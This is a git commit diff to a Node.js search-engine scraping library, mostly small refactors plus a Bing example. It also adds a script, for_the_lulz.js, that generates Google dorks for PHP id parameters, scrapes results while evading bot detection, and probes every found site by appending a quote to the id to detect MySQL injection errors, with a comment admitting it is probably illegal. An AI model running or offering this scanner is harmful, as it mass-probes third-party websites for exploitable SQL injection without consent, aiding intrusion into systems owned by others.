forked from extern/se-scraper
worked on issue #31
This commit is contained in:
parent 80d23a9d57, commit 0d7f6dcd11
@@ -188,6 +188,7 @@ You can define your own scraper class and use it within se-scraper.
 * [Scrape 100 keywords on Bing with multiple tabs in one browser](examples/multiple_tabs.js) produces [this](examples/results/bing.json)
 * [Scrape two keywords on Amazon](examples/amazon.js) produces [this](examples/results/amazon.json)
 * [Inject your own scraping logic](examples/pluggable.js)
+* [For the Lulz: Scraping google dorks for SQL injection vulnerabilities and confirming them.](examples/for_the_lulz.js)

 ## Scraping Model
TODO.md (+2)
@@ -51,3 +51,5 @@
 ### TODO:
 1. fix googlenewsscraper waiting for results and parsing. remove the static sleep [done]
 2. when using multiple browsers and random user agent, pass a random user agent to each perBrowserOptions
+
+3. don't create a new tab when opening a new scraper
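TODO item 2 could be approached roughly as in the sketch below. This is only an illustration, not part of the commit: it assumes that browser_config accepts a perBrowserOptions array (as the TODO wording suggests), and the helper random_user_agent() plus the agent strings are made up for the example.

// Illustrative sketch for TODO item 2: one random user agent per browser.
// Assumption: browser_config accepts a perBrowserOptions array; the agent list is arbitrary.
const example_user_agents = [
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',
];

function random_user_agent() {
    // pick one agent string at random for each browser instance
    return example_user_agents[Math.floor(Math.random() * example_user_agents.length)];
}

let num_browsers = 2;

let browser_config = {
    random_user_agent: false, // agents are assigned explicitly per browser below
    perBrowserOptions: Array.from({ length: num_browsers }, () => ({
        user_agent: random_user_agent(),
    })),
};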
Binary file not shown (image added, 74 KiB).
examples/bing_de.json (new file, 4645 lines)
File diff suppressed because it is too large.
examples/bing_multiple_browser_multiple_pages.js (new file, 91 lines)
@@ -0,0 +1,91 @@
var fs = require('fs');
var path = require('path');
var os = require("os");

const se_scraper = require('./../index.js');
var filepath_de = path.join(__dirname, '/data/keywords_de.txt');

function read_keywords_from_file(fpath) {
    let kws = fs.readFileSync(fpath).toString().split(os.EOL);
    // clean keywords
    kws = kws.filter((kw) => {
        return kw.trim().length > 0;
    });
    return kws;
}

let keywords_de = read_keywords_from_file(filepath_de);

const Cluster = {
    CONCURRENCY_PAGE: 1, // shares cookies, etc.
    CONCURRENCY_CONTEXT: 2, // no cookie sharing (uses contexts)
    CONCURRENCY_BROWSER: 3, // no cookie sharing, individual processes (uses separate browser instances)
};

// these options need to be provided on startup
// and cannot be passed to se-scraper on scrape() calls
let browser_config = {
    // the user agent to scrape with
    user_agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
    // if random_user_agent is set to true, a random user agent is chosen
    random_user_agent: true,
    verbose: true,
    // whether to start the browser in headless mode
    headless: true,
    // whether debug information should be printed
    // level 0: print nothing
    // level 1: print most important info
    // ...
    // level 4: print all shit nobody wants to know
    debug_level: 1,
    is_local: false,
    throw_on_detection: false,
    puppeteer_cluster_config: {
        headless: true,
        timeout: 2 * 60 * 1000, // max timeout set to 2 minutes
        monitor: false,
        concurrency: 3, // Cluster.CONCURRENCY_BROWSER: one browser per scraper
        maxConcurrency: 3, // scrape with 3 browsers in parallel
    }
};

(async () => {
    // scrape config can change on each scrape() call
    let scrape_config_bing_de = {
        // which search engine to scrape
        search_engine: 'bing',
        // an array of keywords to scrape
        keywords: keywords_de,
        // the number of pages to scrape for each keyword
        num_pages: 10,

        // OPTIONAL PARAMS BELOW:
        // https://docs.microsoft.com/en-us/rest/api/cognitiveservices-bingsearch/bing-web-api-v5-reference#query-parameters
        bing_settings: {
            cc: 'DE', // The cc parameter determines the country to use for the query.
            mkt: 'de-DE', // The mkt parameter determines the UI language to return results.
            offset: 0, // Determines the results offset to use, defaults to 0.
            count: 20, // Determines the number of results to show, defaults to 10. Maximum is 100.
        },
        // how long to sleep between requests. a random sleep interval within the range [a,b]
        // is drawn before every request. empty string for no sleeping.
        sleep_range: '',
        // path to output file, data will be stored in JSON
        output_file: 'examples/bing_de.json',
        // whether to prevent images, css, fonts from being loaded
        // will speed up scraping a great deal
        block_assets: true,
        // check if headless chrome escapes common detection techniques
        // this is a quick test and should be used for debugging
        test_evasion: false,
        apply_evasion_techniques: true,
        // log ip address data
        log_ip_address: false,
        // log http headers
        log_http_headers: false,
    };

    let results = await se_scraper.scrape(browser_config, scrape_config_bing_de);
    console.dir(results.metadata, {depth: null, colors: true});

})();
examples/data/keywords_de.txt (new file, 6 lines)
@@ -0,0 +1,6 @@
filetype:pdf anleitung
filetype:pdf berge
filetype:pdf iso 27001
filetype:pdf pruefugn
filetype:pdf klima
filetype:pdf archiv news
examples/for_the_lulz.js (new file, 100 lines)
@@ -0,0 +1,100 @@
/*
 * Do not run this, this is probably illegal in your country ;)
 */

const se_scraper = require('./../index.js');
const got = require('got'); // used below to probe the scraped links

// generate some google dorks

let lulz_keywords = [];

['seite', 'inicio', 'index'].forEach((x) => {
    for (var i = 0; i < 2; i++) {
        lulz_keywords.push(
            'inurl:"' + x + '.php?id=' + Math.floor(Math.random() * 100) + '"'
        )
    }
});

console.log(lulz_keywords);

// these options need to be provided on startup
// and cannot be passed to se-scraper on scrape() calls
let browser_config = {
    // if random_user_agent is set to true, a random user agent is chosen
    random_user_agent: true,
    headless: true,
    // whether debug information should be printed
    // level 0: print nothing
    // level 1: print most important info
    // ...
    // level 4: print all shit nobody wants to know
    debug_level: 1,
    is_local: false,
    throw_on_detection: false,
    puppeteer_cluster_config: {
        headless: true,
        timeout: 2 * 60 * 1000, // max timeout set to 2 minutes
        monitor: false,
        concurrency: 3, // Cluster.CONCURRENCY_BROWSER: one browser per scraper
        maxConcurrency: 4, // scrape with 4 browsers in parallel
    }
};

(async () => {
    // scrape config can change on each scrape() call
    let lulz_config = {
        // which search engine to scrape
        search_engine: 'google',
        // an array of keywords to scrape
        keywords: lulz_keywords,
        // the number of pages to scrape for each keyword
        num_pages: 3,
        // how long to sleep between requests. a random sleep interval within the range [a,b]
        // is drawn before every request. empty string for no sleeping.
        sleep_range: '',
        // path to output file, data will be stored in JSON
        output_file: 'goodboys.json',
        // whether to prevent images, css, fonts from being loaded
        // will speed up scraping a great deal
        block_assets: true,
        // check if headless chrome escapes common detection techniques
        // this is a quick test and should be used for debugging
        test_evasion: false,
        apply_evasion_techniques: true,
        // log ip address data
        log_ip_address: false,
        // log http headers
        log_http_headers: false,
    };

    let results = await se_scraper.scrape(browser_config, lulz_config);

    const all_links = [];

    for (var kw in results) {
        for (var page in results[kw]) {
            for (var res of results[kw][page]['results']) {
                all_links.push(res.link);
            }
        }
    }

    console.log(all_links);

    for (var link of all_links) {
        try {
            const response = await got(link.replace(/(id=\d+)/g, "$1'"));
            let html = response.body;
            if (html.includes('error') || html.includes('mysql')) {
                console.log('Got a mysql injection in ' + link);
            }
        } catch (error) {
            console.log(error.response.statusCode);
        }
    }

})();
@@ -105,7 +105,7 @@ class AmazonScraper extends Scraper {
            console.log('Using startUrl: ' + startUrl);
        }

-       await this.page.goto(startUrl);
+       this.last_response = await this.page.goto(startUrl);

        try {
            await this.page.waitForSelector('input[name="field-keywords"]', { timeout: this.STANDARD_TIMEOUT });
@@ -39,7 +39,7 @@ class BaiduScraper extends Scraper {
        let startUrl = this.build_start_url('https://www.baidu.com/s?') || 'https://www.baidu.com/';

        try {
-           await this.page.goto(startUrl);
+           this.last_response = await this.page.goto(startUrl);
            await this.page.waitForSelector('input[name="wd"]', { timeout: 5000 });
        } catch (e) {
            return false;
@@ -49,7 +49,7 @@ class BingScraper extends Scraper {

        try {
            await this.page.goto(startUrl);
-           await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
+           await this.page.waitForSelector('input[name="q"]', { timeout: this.STANDARD_TIMEOUT });
        } catch (e) {
            return false;
        }
@@ -69,14 +69,17 @@ class BingScraper extends Scraper {
        if (!next_page_link) {
            return false;
        }
-       await next_page_link.click();
-       await this.page.waitForNavigation();
+       this.last_response = await Promise.all([
+           next_page_link.click(), // The promise resolves after navigation has finished
+           this.page.waitForNavigation(), // Clicking the link will indirectly cause a navigation
+       ]);

        return true;
    }

    async wait_for_results() {
-       await this.page.waitForSelector('#b_content', { timeout: 5000 });
+       await this.page.waitForSelector('#b_content', { timeout: this.STANDARD_TIMEOUT });
    }

    async detected() {
@@ -126,7 +129,7 @@ class BingNewsScraper extends Scraper {
                console.log('Sleeping 30 seconds. Set your settings now.');
                await this.sleep(30000);
            }
-           await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
+           await this.page.waitForSelector('input[name="q"]', { timeout: this.STANDARD_TIMEOUT });
        } catch (e) {
            return false;
        }
@@ -147,14 +150,17 @@ class BingNewsScraper extends Scraper {
        if (!next_page_link) {
            return false;
        }
-       await next_page_link.click();
-       await this.page.waitForNavigation();
+       this.last_response = await Promise.all([
+           next_page_link.click(), // The promise resolves after navigation has finished
+           this.page.waitForNavigation(), // Clicking the link will indirectly cause a navigation
+       ]);

        return true;
    }

    async wait_for_results() {
-       await this.page.waitForSelector('#news', { timeout: 5000 });
+       await this.page.waitForSelector('#news', { timeout: this.STANDARD_TIMEOUT });
    }

    async detected() {
@@ -42,7 +42,7 @@ class DuckduckgoScraper extends Scraper {
        let startUrl = this.build_start_url('https://duckduckgo.com/?') || 'https://duckduckgo.com/';

        try {
-           await this.page.goto(startUrl);
+           this.last_response = await this.page.goto(startUrl);
            await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
        } catch (e) {
            return false;
@@ -116,7 +116,7 @@ class DuckduckgoNewsScraper extends Scraper {

    async load_start_page() {
        try {
-           await this.page.goto('https://duckduckgo.com/?q=42&t=h_&iar=news&ia=news');
+           this.last_response = await this.page.goto('https://duckduckgo.com/?q=42&t=h_&iar=news&ia=news');
            await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
        } catch (e) {
            console.error(e);
@@ -140,7 +140,7 @@ class DuckduckgoNewsScraper extends Scraper {
        }
        await next_page_link.click();
        try {
-           await this.page.waitForNavigation({timeout: 5000});
+           this.last_response = await this.page.waitForNavigation({timeout: 5000});
        } catch(e) {
            return false;
        }
@@ -75,7 +75,7 @@ class GoogleScraper extends Scraper {

        log(this.config, 1, 'Using startUrl: ' + startUrl);

-       await this.page.goto(startUrl);
+       this.last_response = await this.page.goto(startUrl);

        try {
            await this.page.waitForSelector('input[name="q"]', { timeout: this.STANDARD_TIMEOUT });
@@ -175,7 +175,7 @@ class GoogleNewsOldScraper extends Scraper {
        let url = this.build_start_url(`https://www.google.com/search?q=${keyword}&source=lnms&tbm=nws&`) ||
            `https://www.google.com/search?q=${keyword}&hl=en&source=lnms&tbm=nws`;

-       await this.page.goto(url, {
+       this.last_response = await this.page.goto(url, {
            referer: 'https://www.google.com/'
        });

@@ -252,7 +252,7 @@ class GoogleImageScraper extends Scraper {

    async load_start_page() {
        try {
-           await this.page.goto(`https://www.google.com/imghp?tbm=isch`, {
+           this.last_response = await this.page.goto(`https://www.google.com/imghp?tbm=isch`, {
                referer: 'https://www.google.com/'
            });
            await this.page.waitForSelector('input[name="q"]', { timeout: this.STANDARD_TIMEOUT });
@@ -269,7 +269,7 @@ class GoogleImageScraper extends Scraper {
        await input.focus();
        await this.page.keyboard.press("Enter");
        // this waitForNavigation makes hardcoded sleeps not necessary
-       await this.page.waitForNavigation();
+       this.last_response = await this.page.waitForNavigation();
    }

    async next_page() {
|
|||||||
async load_start_page() {
|
async load_start_page() {
|
||||||
try {
|
try {
|
||||||
this.all_results = new Set();
|
this.all_results = new Set();
|
||||||
await this.page.goto(`https://news.google.com/?hl=en-US&gl=US&ceid=US:en`, {
|
this.last_response = await this.page.goto(`https://news.google.com/?hl=en-US&gl=US&ceid=US:en`, {
|
||||||
referer: 'https://news.google.com'
|
referer: 'https://news.google.com'
|
||||||
});
|
});
|
||||||
|
|
||||||
|
@@ -45,7 +45,7 @@ class InfospaceScraper extends Scraper {
        let startUrl = this.build_start_url('http://search.infospace.com/search/web?') || 'http://infospace.com/index.html';

        try {
-           await this.page.goto(startUrl);
+           this.last_response = await this.page.goto(startUrl);
            await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
        } catch (e) {
            return false;
@@ -67,7 +67,7 @@ class InfospaceScraper extends Scraper {
            return false;
        }
        await next_page_link.click();
-       await this.page.waitForNavigation();
+       this.last_response = await this.page.waitForNavigation();

        return true;
    }
@@ -117,7 +117,7 @@ class WebcrawlerNewsScraper extends Scraper {

    async load_start_page() {
        try {
-           await this.page.goto('https://www.webcrawler.com/?qc=news');
+           this.last_response = await this.page.goto('https://www.webcrawler.com/?qc=news');
            await this.page.waitForSelector('input[name="q"]', { timeout: 5000 });
        } catch (e) {
            return false;
@@ -19,6 +19,7 @@ module.exports = class Scraper {
        } = options;

        this.page = page;
+       this.last_response = null; // the last response object
        this.metadata = {};
        this.pluggable = pluggable;
        this.config = config;
@@ -212,6 +213,16 @@ module.exports = class Scraper {

            console.error(`Problem with scraping ${keyword} in search engine ${this.config.search_engine_name}: ${e}`);

+           if (this.last_response) {
+               log(this.config, 2, this.last_response);
+           }
+
+           try {
+               // Try to save a screenshot of the error
+               await this.page.screenshot({path: `debug_se_scraper_${this.config.search_engine_name}_${keyword}.png`});
+           } catch (e) {
+           }
+
            if (await this.detected() === true) {
                console.error(`${this.config.search_engine_name} detected the scraping!`);

@@ -56,7 +56,7 @@ class YoutubeScraper extends Scraper {
    async load_start_page() {
        try {
            this.all_videos = new Set();
-           await this.page.goto('https://www.youtube.com', {
+           this.last_response = await this.page.goto('https://www.youtube.com', {
                referer: 'https://google.com'
            });
            await this.page.waitForSelector('input[id="search"]', { timeout: 5000 });
@@ -375,7 +375,7 @@ class ScrapeManager {
            if (this.config.use_proxies_only) {
                this.config.proxy = this.config.proxies[c]; // every cluster has a dedicated proxy
            } else if(c > 0) {
-               this.config.proxy = this.config.proxies[c - 1]; // first cluster uses own ip address
+               this.config.proxy = this.config.proxies[c-1]; // first cluster uses own ip address
            }

            var obj = getScraper(this.config.search_engine, {
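For clarity, a worked example of the proxy assignment shown above; the proxy URLs and cluster count are illustrative assumptions, not values from the commit:

// Suppose proxies = ['socks5://p1:1080', 'socks5://p2:1080'] and three clusters (c = 0, 1, 2).
// With use_proxies_only = false:
//   c = 0  ->  no proxy assigned, the machine's own IP is used
//   c = 1  ->  proxies[0]  ('socks5://p1:1080')
//   c = 2  ->  proxies[1]  ('socks5://p2:1080')
// With use_proxies_only = true, cluster c simply gets proxies[c], so one proxy per cluster is required.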